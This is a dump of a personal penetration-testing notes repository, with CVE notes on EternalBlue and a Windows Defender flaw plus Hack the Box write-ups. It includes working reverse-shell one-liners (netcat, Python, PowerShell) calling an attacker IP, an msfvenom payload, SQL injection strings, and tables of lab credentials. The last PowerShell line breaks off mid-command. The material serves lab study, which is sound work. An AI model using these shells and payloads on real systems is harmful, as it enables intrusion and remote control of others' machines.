| 47 | Configure options as per [this excellent tutorial](https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/). You may have to use `smb_send_file()` to deliver your payload rather than the `bitsadmin` method. 48 | 49 | Generate a shell payload using `msfvenom`: 50 | 51 | ```bash 52 | $ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.6 lport=9001 -f exe -o sc.exe 53 | ``` 54 | 55 | Start a handler using `msfconsole`: 56 | 57 | ```bash 58 | ┌──(mac㉿kali)-[~/Documents/HTB/legacy] 59 | └─$ msfconsole -q 60 | msf6 > use exploit/multi/handler 61 | [*] Using configured payload generic/shell_reverse_tcp 62 | msf6 exploit(multi/handler) > set payload windows/shell_reverse_tcp 63 | payload => windows/shell_reverse_tcp 64 | msf6 exploit(multi/handler) > set lhost tun0 65 | lhost => tun0 66 | msf6 exploit(multi/handler) > set lport 9001 67 | lport => 9001 68 | msf6 exploit(multi/handler) > run 69 | 70 | [*] Started reverse TCP handler on 10.10.14.6:9001 71 | ``` 72 | 73 | Run exploit: 74 | 75 | ```bash 76 | $ python2 exploit.py [IP] 77 | ``` 78 | 79 | **Practical Examples** 80 | 81 | - Windows 7: [[Writeups/Hack the Box/Boxes/Blue/10 - Eternal Blue#Working Exploit - 42315|Blue - Eternal Blue > Working Exploit - 42315]] 82 | - Windows XP: [[Writeups/Hack the Box/Boxes/Legacy/10 - Eternal Blue|Legacy - Eternal Blue]] 83 | 84 | ## Mitigations 85 | 86 | Patch! 87 | 88 | ## In the News 89 | 90 | - [https://www.wired.co.uk/article/what-is-eternal-blue-exploit-vulnerability-patch](https://www.wired.co.uk/article/what-is-eternal-blue-exploit-vulnerability-patch) 91 | - [https://www.computerweekly.com/news/252440964/WannaCrys-EternalBlue-exploit-still-a-threat](https://www.computerweekly.com/news/252440964/WannaCrys-EternalBlue-exploit-still-a-threat) 92 | 93 | # Tags 94 | 95 | #cve #windows #smb -------------------------------------------------------------------------------- /Vulnerabilities/Windows/CVE-2021-24092.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-24092 2 | 3 | CVE Details: 4 | - [https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24092](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-24092) 5 | - [https://www.rapid7.com/db/vulnerabilities/windows-defender-cve-2021-24092/](https://www.rapid7.com/db/vulnerabilities/windows-defender-cve-2021-24092/) 6 | 7 | ## Affected Technologies 8 | 9 | Windows Machines running unpatched version of Windows Defender 10 | 11 | ## What Does it Do? 12 | 13 | Allows privilege escalation by overwriting an arbitrary file using the `BTR.sys` driver. 14 | 15 | A hardlink can be created at `C:\Windows\Temp\BootClean.log` which will cause the linked file to be overwritten by Windows Defender. 16 | 17 | ## In the News 18 | 19 | [https://labs.sentinelone.com/cve-2021-24092-12-years-in-hiding-a-privilege-escalation-vulnerability-in-windows-defender/](https://labs.sentinelone.com/cve-2021-24092-12-years-in-hiding-a-privilege-escalation-vulnerability-in-windows-defender/) -------------------------------------------------------------------------------- /Writeups/CTFs/SESH BakeryTF/BakeryTF Writeups Index.md: -------------------------------------------------------------------------------- 1 | # BakeryTF Writeups Index 2 | 3 | ## Raspberry Peist 4 | 5 | A Hack-the-box style web -> root challenge for the CTF main prize. Writeup [[Raspberry Peist Writeup|here]] 6 | 7 | ## Juicy Part 3 8 | 9 | A PHP deserialisation challenge. Writeup [[Juicy Part 3 Writeup|here]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Armageddon/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This box involved exploiting a CVE in Drupal, a CMS, on a Wordpress site. From there you could get a (very temperamental) shell, and find a MySQL password in a config file. This lets us dump hashes from the database and switch to the `bruceistherealadmin` user, who can run `snap install` as root. This leads us to the 'Dirty Sock' snap exploit, which gives us a shell as a new user with root-equivalent permissions. 4 | 5 | The initial exploit for the box wasn't difficult to find, and the first privesc was just a case of finding the right config file. But I really enjoyed the privesc to root - reading up on how the CVE works was extremely interesting, and getting it to work was challenging enough without being frustrating. 6 | 7 | ## Ratings 8 | 9 | I rated user a 3 difficulty, as it took me a lot of fumbling around and there were some frustrating aspects of the foothold shell interactivity that made things hard, but the steps were overall very simple. 10 | 11 | I rated root a 3 also, as it wasn't too hard to identify and recreate the exploit. It wasn't as simple as just running dirty sock, but it was very easy to take their payload and reuse it. Creating your own snap was an extra layer of difficulty, but not necessary for the root. 12 | 13 | **Matrix:** 14 | 15 | ![[Pasted image 20210405152937.png]] 16 | 17 | You'd like to think this isn't very real life-applicable, as many of the CVEs are quite old; however, we know that people don't patch their stuff... -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Armageddon/01 - Loot.md: -------------------------------------------------------------------------------- 1 | # Loot 2 | 3 | |User|Password|Service| 4 | |---|---|---| 5 | |drupaluser|CQHEy@9M\*m23gBVj|MySQL| 6 | |brucetherealadmin|booboo|Drupal Login/Linux User| -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Armageddon/10 - Website.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | ## Login Form 4 | 5 | Visiting the homepage presents us with a login screen: 6 | 7 | ![[Pasted image 20210330103246.png]] 8 | 9 | There is a 'powered by' string in the footer, but no obvious version number. The software listed is `Arnageddon`, a slight variation on spelling that is easy to miss. On previous boxes like Doctor this one letter off has been relevant, but after a quick check on searchsploit to see if there are any documented vulnerabilities it seems it was just a misspelling: 10 | 11 | ```bash 12 | ┌──(mac㉿kali)-[~/Documents/HTB/armageddon] 13 | └─$ searchsploit arnageddon 14 | Exploits: No Results 15 | Shellcodes: No Results 16 | ``` 17 | 18 | A quick check of the source confirms that Drupal 7 is used: 19 | 20 | ![[Pasted image 20210330104241.png]] 21 | 22 | I'll come back to this, but do some manual poking of the site first. 23 | 24 | It seems we can register for an account. Let's do this, passing the request through Burp. 25 | 26 | ![[Pasted image 20210330111528.png]] 27 | 28 | There don't seem to be any useful hidden fields that could be edited to give us extra permissions. 29 | 30 | We get this message when we submit. If we had submitted a password when we created the account then I might attempt logging in despite the account needing approval, but it looks like we are stuck for now. 31 | 32 | ![[Pasted image 20210330111117.png]] 33 | 34 | I tried some basic SQL Injections on the login form, submitting `' OR 1=1;--` in the username and password fields. I also tried the polyglot `SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/` from [this article](https://dev.to/didymus/xss-and-sqli-polyglot-payloads-4hb4). However, it did not trigger any errors. 35 | 36 | ## Drupal Directory Listing 37 | 38 | I wasn't sure where to go from here, so started to look at the results from the Gobuster scan. 39 | 40 | Being unfamiliar with Drupal, I decided to start with `/profiles` in case it had any details of usernames registered on the platform. This revealed a directory listing: 41 | 42 | ![[Pasted image 20210330113044.png]] 43 | 44 | Lots of these files are from 2017, which suggests the version of Drupal that is running is an old version. Running `searchploit drupal` reveals many results concerning Drupal 7. Let's see if we can use one to get a shell. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Armageddon/Armageddon Index.md: -------------------------------------------------------------------------------- 1 | # Armageddon Index 2 | Overview: [[Writeups/Hack the Box/Boxes/Armageddon/0 - Overview]] 3 | 4 | All Credentials: [[Writeups/Hack the Box/Boxes/Armageddon/01 - Loot]] 5 | 6 | Enumeration: [[Writeups/Hack the Box/Boxes/Armageddon/05 - Enumeration]] 7 | 8 | Website: [[Writeups/Hack the Box/Boxes/Armageddon/10 - Website]] 9 | 10 | Shell as Apache: [[Writeups/Hack the Box/Boxes/Armageddon/15 - Shell as apache]] 11 | 12 | SSH as brucetherealadmin: [[20 - SSH as brucetherealadmin]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Atom/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Atom Overview 2 | 3 | **Box Details** 4 | 5 | |IP|Difficulty|OS|Date Started|Date User Owned|Date Completed| 6 | |---|---|---|---|---|---| 7 | |10.10.10.237|Medium|Windows|2021-04-19|2021-06-02|2021-06-22| 8 | 9 | Atom was an interesting, but at times frustrating, box that involved pushing a malicious update file to an insecure Samba share, which exploited a CVE to get code execution on the box. Root involved finding some passwords in PortableKanban and Redis. 10 | 11 | I liked the concept of this box, but it was super fiddly to execute and find the correct syntax. Situations like that frustrate me on Hack the Box, but I got there in the end. System involved a lot of poking around config files, which again isn't my favourite challenge, but it is an important skill to have and I learned how to interact with Redis, a common service. 12 | 13 | I rated User a 4 for difficulty, as the exploit was a little obscure and the hints weren't explicit enough to not require extensive debugging (not that this is a bad thing, it just makes it harder). I rated root a 5 for difficulty, as it involved a lot of digging around and a few new tools I'd never used before. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Atom/10 - Website.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | The website seems to be a page for a note taking application called Heed. 4 | 5 | ![[Pasted image 20210419140434.png]] 6 | 7 | There is a download link at the bottom of the page. Only the download for the Windows Version works. 8 | 9 | ![[Pasted image 20210419141139.png]] 10 | 11 | It says the source is from codepen. I did a brief search of public pens: [https://codepen.io/search/pens?q=heed](https://codepen.io/search/pens?q=heed) - but I got no obvious results. There was also nothing interesting in the site source. 12 | 13 | Besides the download link, no other pages seem to be linked from the main page. [[Writeups/Hack the Box/Boxes/Atom/5 - Enumeration#gobuster|Gobuster]] also threw nothing up. The only interesting Gobuster result was the `/examples` directory, which had a 503 status code. 14 | 15 | ![[Pasted image 20210419143912.png]] 16 | 17 | I added a entry for `atom.htb` to my hosts and visited that domain to see if there was a different page. Unfortunately the page stayed the same. 18 | 19 | ![[Pasted image 20210420170704.png]] 20 | 21 | I also checked out the `/releases` directory to see if there were any other versions of the code available: 22 | 23 | ![[Pasted image 20210421211435.png]] 24 | 25 | There was a directory listing, but only the one file. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Atom/Atom Index.md: -------------------------------------------------------------------------------- 1 | # Atom Index 2 | Overview: [[Writeups/Hack the Box/Boxes/Atom/0 - Overview|Overview]] 3 | 4 | Enumeration: [[Writeups/Hack the Box/Boxes/Atom/5 - Enumeration|Enumeration]] 5 | 6 | Website: [[Writeups/Hack the Box/Boxes/Atom/10 - Website|Website]] 7 | 8 | Samba: [[Writeups/Hack the Box/Boxes/Atom/15 - SMB|SMB]] 9 | 10 | Electron Builder: [[20 - Exploiting Electron Builder|Electron Builder]] 11 | 12 | Automating Foothold [[25 - Automate Foothold]] 13 | 14 | Shell as Jason -> SYSTEM [[30 - Shell as jason]] -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bashed/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | This is the fifth box in my OSCP prep series. 4 | 5 | **Box Details** 6 | 7 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 8 | |---|---|---|---|---| 9 | |10.10.10.68|3.3|Linux|2021-05-05|2021-05-05| 10 | 11 | --- 12 | 13 | This box was pretty easy. The initial foothold was quite simple, and just involved digging around a website to find a webshell that had been left there by a developer. Getting user took me about half an hour including scans. 14 | 15 | Priv esc took a little longer - I wasn't working on it with 100% concentration so missed a few key things that I should have spotted straight away. Specifically, `www-data` could run commands as `scriptmanager`, which allowed us to edit a script that was run by root and cause it to instead spawn us a shell. The priv esc was very simple once you found it, but I just looked in the wrong places for a little while. Overall the box took about 2.5 hours. 16 | 17 | I did learn a bit about upgrading shells - part of the reason it took me a little longer was because working out of a webshell was slower due to its lower interactivity, but I found a nice new Python reverse shell that I can use in future. 18 | 19 | ## Ratings 20 | 21 | I rated user a 2 for difficulty as there was a bit more guesswork and investigation involved to find a foothold, but ultimately the steps were simple and there was no privesc from `www-data` to `arrexel`. 22 | 23 | I rated root a 2 also, but considered rating it a 3. I felt a bit rusty on this box, and struggled a little with remembering my best practices - but overall the privesc was very simple, and once I figured out where to look and managed to upgrade my shell it was plain sailing. 24 | 25 | # Tags 26 | 27 | #writeup #oscp-prep #linux #web #file-misconfiguration #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bashed/10 - Website.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | This website seems to be a promotional page for a replica bash shell written in PHP. 4 | 5 | ![[Pasted image 20210505083541.png]] 6 | 7 | The links all point back to `index.html` 8 | 9 | ![[Pasted image 20210505085925.png]] 10 | 11 | I also checked the source, but there were no hidden links and the form submission didn't go anywhere. It did mention PHP: 12 | 13 | ![[Pasted image 20210505090749.png]] 14 | 15 | As the source and the site itself both mention php, I quickly checked if the `.php` extension was valid: 16 | 17 | ![[Pasted image 20210505085959.png]] 18 | 19 | But it seemed the index page at least was running on pure HTML. 20 | 21 | The blog post, dated in 2017, suggests that the web shell is available on the server, and even gives us a potential URL: 22 | 23 | ![[Pasted image 20210505090142.png]] 24 | 25 | We can also see the source code at: [https://github.com/Arrexel/phpbash](https://github.com/Arrexel/phpbash). We'll come back to this if needed. 26 | 27 | I tried the URL from the screenshot, but it was not found: 28 | 29 | ![[Pasted image 20210505090246.png]] 30 | 31 | Neither was `/phpbash.php`. 32 | 33 | ## PHP Web Shell 34 | 35 | I ran a [[Writeups/Hack the Box/Boxes/Bashed/5 - Enumeration#Gobuster|quick gobuster]] to check for potential directories for the script. It found `/php/` and `/dev/`. I tried `/php/phpbash.php`, and then `/dev/phpbash.php`, which worked: 36 | 37 | ![[Pasted image 20210505090543.png]] 38 | 39 | I did some very quick enumeration, looking for users and quickly finding that `arrexel`'s home directory was world-readable. This gives us the user flag: 40 | 41 | ![[Pasted image 20210505091030.png]] 42 | 43 | ## Trying to Get a Reverse Shell 44 | 45 | Before I enumerated more for priv esc, I wanted a better shell. I tried a few commands, to no avail: 46 | 47 | ![[Pasted image 20210505093721.png]] 48 | 49 | I googled "netcat openbsd reverse shell" and tried the following commands: 50 | 51 | ```bash 52 | www-data@bashed:/var/www/html/dev# rm /tmp/f;mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9001 >/tmp/f 53 | 54 | www-data@bashed:/var/www/html/dev# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.13 9001 >/tmp/f 55 | ``` 56 | 57 | But I got no result. 58 | 59 | I also tried the `upload` custom command mentioned in the source code, to no avail. 60 | 61 | ![[Pasted image 20210505101232.png]] 62 | 63 | I decided to continue with enumeration and come back to this once I'd rooted the box and see if anyone had done it in a writeup. I would eventually [[15 - Privesc#Upgrading Shell|upgrade my shell]]. 64 | 65 | # Tags 66 | 67 | #writeup #oscp-prep #web -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bashed/20 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | This privesc was a little messy from me. I struggled getting an interactive shell, and missed some basic enumeration like `sudo -l` and checking for scheduled processes. 4 | 5 | I also could have handled the `.py` file editing better - [0xdf's writeup](https://0xdf.gitlab.io/2018/04/29/htb-bashed.html) involved moving the file to `.py.old` and making a new one, which would have helped in the cleanup process (and for detecting that it was being run in the first place). 6 | 7 | I also now have a new Python reverse shell to use - `import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")` -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bashed/Bashed Index.md: -------------------------------------------------------------------------------- 1 | # Bashed Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Bashed/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Bashed/5 - Enumeration|Enumeration]] 6 | 7 | Website & Shell: [[Writeups/Hack the Box/Boxes/Bashed/10 - Website|Website]] 8 | 9 | Privesc: [[15 - Privesc|Privesc]] 10 | 11 | Key Lessons: [[Writeups/Hack the Box/Boxes/Bashed/20 - Key Lessons]] 12 | 13 | # Tags 14 | 15 | #writeup #oscp-prep #linux #web #file-misconfiguration #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Blue/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | In preparation for my OSCP, I have begun the long journey of completing all retired boxes, sorted by user-rated difficulty. Starting on the 1st May 2021, I am doing *Blue*. 3 | 4 | *Note:* I am doing these retired boxes for now on our shared [SESH Account](https://www.hackthebox.eu/profile/451740) - because why pay for VIP twice? 5 | 6 | I have been recommended to tackle these up to about a 6 in difficulty, as that is about the highest I should encounter in the exam. I don't expect to do them all by the time I sit my exam (aiming for mid-late August 2021), but I have to start somewhere. I expect to learn a lot, especially about Windows which is currently my weakest area. 7 | 8 | **Box Details** 9 | 10 | |IP|User-Rated Difficulty|OS|Date Started|Date Completed| 11 | |---|---|---|---|---| 12 | |10.10.10.40|2.4|Windows (7)|2021-05-01|2021-05-01| 13 | 14 | Blue has a difficulty rating of 2.4, the lowest on HTB: 15 | 16 | ![[Pasted image 20210501114708.png]] 17 | 18 | --- 19 | 20 | The box was super simple - all it involved was enumerating the box to discover SMB was running and that the OS was Windows 7, vulnerable to Eternal Blue. 21 | 22 | If you want to root it quickly, you can just use metasploit. I tried to manually exploit it, as Metasploit is not allowed on OSCP. It took an extra couple of hours to setup and get the right details, but was still pretty easy - just fiddly. 23 | 24 | All in all it only took about 3 hours. Pretty slow going for a box of this difficulty, but I will hopefully speed that up - and now I'm equipped with a working Eternal Blue exploit I can reuse that on other boxes :) 25 | 26 | ## Ratings 27 | 28 | I rated the box a 1 for both user and root - the exploit was simple really, made harder only by the fact I tried to do it manually. And there was no priv esc involved, as it dropped us straight in as `SYSTEM`. 29 | 30 | # Tags 31 | 32 | #writeup #windows #cve #smb #oscp-prep #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Blue/15 - Key Lessons.md: -------------------------------------------------------------------------------- 1 | # Key Lessons 2 | 3 | Here are some of the key things I learned on this box: 4 | - Basic enumeration of SMB servers with `smbmap` 5 | - Null authentication, and authentication with specific named guest accounts 6 | - Use of the nmap `--script vuln` flag to scan for vulnerabilities 7 | - Important skills running Python scripts written in different versions of Python, and installing packets for specific Python versions 8 | - Enumeration of named pipes using the Metasploit `auxiliary/scanner/smb/pipe_auditor` module 9 | - Generation of shellcode for windows platforms with `msfvenom` 10 | - Configuration of the Eternal Blue exploit to match the specific named pipes and SMB login credentials for a target machine 11 | 12 | Although this is the easiest box on Hack the Box, it taught me an awful lot! -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Blue/Blue Index.md: -------------------------------------------------------------------------------- 1 | # Blue Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Blue/0 - Overview|Overview]] 4 | 5 | Enumeration: [[Writeups/Hack the Box/Boxes/Blue/5 - Enumeration|Enumeration]] 6 | 7 | Eternal Blue: [[10 - Eternal Blue|Eternal Blue]] 8 | 9 | # Tags 10 | 11 | #writeup #cve #windows #smb #oscp-prep #no-metasploit -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bucket/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | **Box Details** 4 | 5 | |IP|User-Rated Difficulty|OS|Date Started|Date User Completed|Date Root Completed| 6 | |---|---|---|---|---|---| 7 | |10.10.10.212|5.7|Linux|2020-12-15|2020-12-18|2020-12-22| 8 | 9 | I did this box back in December 2020. It was the fifth box I'd done, and only the second medium-rated box I'd tried. It took me a few days of pretty non-stop work to get User, and I had Root after a week. 10 | 11 | I wasn't as good at taking screenshots for my notes back then, so when I converted this writeup to Obsidian I made sure to go back and get some. Therefore you may see some screenshots dated after the box retired. My IP might also change between bash commands :) 12 | 13 | --- 14 | 15 | This is also my first writeup of a HTB box. It is also available [on my website](https://www.mac-goodwin.com/blog/htb/2021/04/29/htb-bucket.html), where the pages are in one sprawling post if you prefer that to notes that sexily link together. 16 | 17 | I'm still working out my personal style for writeups, and this one has turned out to be quite long. I enjoy writing up my thought processes and making my writeups quite detailed - mostly because, primarily, these are resources for me. 18 | 19 | Some people might not like this style, and that is fine - snappier text writeups are available, such as those by [0xdf](https://0xdf.gitlab.io/). But if you like a bit of explanation and a narrative style, as well as seeing where people go wrong, these might be for you. I think there is a benefit to including mistakes in writeups, so we can learn from them going forwards. 20 | 21 | --- 22 | 23 | This box was extremely fun. The initial exploit involved enumerating a webserver to discover it was linked to some AWS resources. There were then two parallel parts: interacting with a DynamoDB shell to exfiltrate some credentials, and uploading a web shell to an S3 bucket for code execution on the box. 24 | 25 | Once you were on the box, you could use the stolen credentials to log in as the user `roy`. roy had access to a locally-hosted web app which you could access via SSH tunneling and exploit by adding a malicious entry in a database that caused the web app to read a sensitive file and convert it to a PDF. 26 | 27 | ## Ratings 28 | 29 | I rated user a 6 for difficulty at the time, as I found the debugging of the DDB code very difficult. After revisiting the box I would probably rate it a 5, as the steps were fairly simple but just required some knowledge of AWS. 30 | 31 | I rated root a 7 for difficulty. It involved some techniques I hadn't used before, such as SSH tunneling, and a cool custom exploitation on a web app, plus an interesting way of stealing a sensitive file via a PDF attachment which I hadn't seen before. 32 | 33 | # Tags 34 | 35 | #writeup #cloud #web -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bucket/1 - Loot.md: -------------------------------------------------------------------------------- 1 | # Creds 2 | Potential emails: 3 | 4 | support@bucket.htb 5 | 6 | Taken from the front page of the `http://bucket.htb` website 7 | 8 | **Credentials** 9 | 10 | Taken from [[Writeups/Hack the Box/Boxes/Bucket/10 - Website#Exfiltrating Data|Dynamo DB]] 11 | 12 | |username|email| 13 | |--|--| 14 | |Mgmt|Management@#1@#| 15 | |Cloudadm|Welcome123!| 16 | |Sysadm(roy)|n2vM-<\_K\_Q:.Aa2| 17 | 18 | # Tags 19 | 20 | #writeup -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Bucket/Bucket Index.md: -------------------------------------------------------------------------------- 1 | # Bucket Index 2 | 3 | Overview: [[Writeups/Hack the Box/Boxes/Bucket/0 - Overview|Overview]] 4 | 5 | Creds: [[1 - Loot|Loot]] 6 | 7 | Enumeration: [[Writeups/Hack the Box/Boxes/Bucket/5 - Enumeration|Enumeration]] 8 | 9 | Website, DDB Shell, and CLI: [[Writeups/Hack the Box/Boxes/Bucket/10 - Website|Website]] 10 | 11 | Shell as www-data, escalating to roy user: [[15 - Shell as www-data]] 12 | 13 | Shell as roy, using `bucket-app` to escalate to root: [[20 - Shell as roy]] 14 | 15 | # Tags 16 | 17 | #writeup #cloud #web -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/0 - Overview.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | **Box Details** 4 | 5 | |IP|User-Rated Difficulty|OS|Date Started|Date User Completed| 6 | |---|---|---|---|---| 7 | |10.10.10.217|7.4|Windows|2020-03-16|2020-04-18| 8 | 9 | This was a very hard box based on a .NET web application; it required a lot of source code analysis and involved a chain of exploits to get a foothold on the box. After reversing the authentication system and forging a JWT token, you could figure out how to insert malicious data into the database to trigger a deserialisation vulnerability. However, the triggering HTTP request had an IP address limitation, meaning only the box itself could trigger it. This meant we needed an XSS or SSRF vulnerability to force a request, which came via a CVE in a markdown rendering library. After this, we could trigger our deserialisation payload and upload a shell to the box. 10 | 11 | A bit of advanced warning - this writeup is *long*. I have tried to include regular 'checkpoints' to let you skip ahead to working payloads. But a big part of this box for me *was* the debugging. It was intense, and full of little hurdles in the formatting of payloads and subtleties of scripts. I think it's important to include this so you can see what I learned. But I understand it's not for everyone. 12 | 13 | --- 14 | 15 | I loved this box. It was my first dive into some really complex Web Application Hacking. I'd been looking at Deserialisation with my hacking society, but hadn't touched it in .NET, and the XSS on this box was really interesting too. It was great to chain everything together and find all the little pieces. 16 | 17 | What also surprised me about this box was the sheer number of little hitches along the way. Maybe this was due to the way I approached it with having fairly little experience, but actually trying to debug things like only being able to communicate over HTTPS and sending data back to my box via `` tags meant I learnt an awful lot while doing this. It was well worth the time investment, and truly was a lesson in persistence. 18 | 19 | I only managed to finish the user stage of this box (although that was no small task). I had a look at the root path at the time, but due to my little Windows priv esc experience I decided to go back and focus on some retired boxes to try and learn a little more. I also had a CTF to run and an AWS exam, and by the time they were finished and I could come back to the box again it was about to retire. I might come back to the root stage at some point, but for now I'm uploading what I've got. 20 | 21 | --- 22 | 23 | This writeup is also available on my site at [mac-goodwin.com](https://www.mac-goodwin.com/blog/htb/2021/06/12/htb-cereal.html) 24 | 25 | ## Scripts 26 | 27 | All the scripts I used on this box are available on my github, at https://github.com/Twigonometry/CTF-Tools/tree/master/hack_the_box/cereal 28 | 29 | ## Ratings 30 | 31 | I rated the user flag a 7/10 for difficulty. It was pretty complex, and involved chaining several exploits together, each with little restrictions baked in just to screw you over. 32 | 33 | # Tags 34 | 35 | #writeup #web #xss #markdown #deserialisation #dotnet #windows -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/1 - Loot.md: -------------------------------------------------------------------------------- 1 | # Loot 2 | 3 | Secret Key: 4 | 5 | ``` 6 | secretlhfIH&FY\*#oysuflkhskjfhefesf 7 | ``` -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/10 - cereal.htb.md: -------------------------------------------------------------------------------- 1 | # Website 2 | 3 | ## Basic Enum 4 | 5 | We can see what powers the site by looking at its headers: 6 | 7 | ```bash 8 | $ curl -v http://cereal.htb 9 | * Trying 10.10.10.217:80... 10 | * Connected to cereal.htb (10.10.10.217) port 80 (#0) 11 | > GET / HTTP/1.1 12 | > Host: cereal.htb 13 | > User-Agent: curl/7.74.0 14 | > Accept: */* 15 | > 16 | * Mark bundle as not supporting multiuse 17 | < HTTP/1.1 307 Temporary Redirect 18 | < Transfer-Encoding: chunked 19 | < Location: https://cereal.htb/ 20 | < Server: Microsoft-IIS/10.0 21 | < X-Rate-Limit-Limit: 5m 22 | < X-Rate-Limit-Remaining: 149 23 | < X-Rate-Limit-Reset: 2021-06-05T18:26:04.5220616Z 24 | < X-Powered-By: Sugar 25 | < Date: Sat, 05 Jun 2021 18:21:04 GMT 26 | < 27 | * Connection #0 to host cereal.htb left intact 28 | ``` 29 | 30 | `Sugar` is an interesting addition in the `X-Powered-By` header that I've never seen before. There also appears to be a rate limit in place, which is something to bear in mind. 31 | 32 | ## Certificate 33 | 34 | Immediately upon visiting the site, Firefox displays a warning about a self-signed certificate 35 | 36 | ![[Pasted image 20210406083553.png]] 37 | 38 | Clicking 'View Certificate' reveals a subdomain, `source.cereal.htb` 39 | 40 | ![[Pasted image 20210406083753.png]] 41 | 42 | (this was also present in the Nmap scan) 43 | 44 | If we want to view the certificate again after accepting it, just click the padlock in the browser and the `>`, then `More Information`. This allows viewing the certificate: 45 | 46 | ![[Pasted image 20210605185025.png]] 47 | 48 | ## Login Form 49 | 50 | Visiting the main site, we are just presented with a login form: 51 | 52 | ![[Pasted image 20210605184135.png]] 53 | 54 | We can do some basic fuzzing of the form: 55 | - try `admin:admin` 56 | - try a simple SQL Injection with the username/password `' OR 1=1;--` 57 | - try an SQLi polyglot to see if the for might be vulnerable: `SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/","password":"SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/"` 58 | 59 | None of this gave any results. There is also seemingly no way to register - visiting `/register` gives us a blank page: 60 | 61 | ![[Pasted image 20210605184317.png]] 62 | 63 | Let's take a look at the `source.cereal.htb` domain and see if there's anything else useful. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/11 - source.cereal.htb.md: -------------------------------------------------------------------------------- 1 | # source.cereal.htb 2 | 3 | Visiting `source.cereal.htb` in the browser gives us this page: 4 | 5 | ![[Pasted image 20210605184402.png]] 6 | 7 | This is interesting - it gives us some potentially useful information: 8 | - The version string: `Version Information: Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.7.3690.0 ` 9 | - And a potential full path disclosure for the application: `c:\inetpub\source\default.aspx` 10 | 11 | The page doesn't seem to have any interactivity beyond this. -------------------------------------------------------------------------------- /Writeups/Hack the Box/Boxes/Cereal/40 - Shell as sonny.md: -------------------------------------------------------------------------------- 1 | # 40 - Shell as sonny 2 | 3 | I wanted to get a proper shell with powershell. I found a few examples: 4 | - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell) 5 | - [https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3) 6 | - [https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1](https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1) 7 | 8 | In the end I went for this one, from [https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/](https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/): 9 | 10 | ```powershell 11 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.92',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = 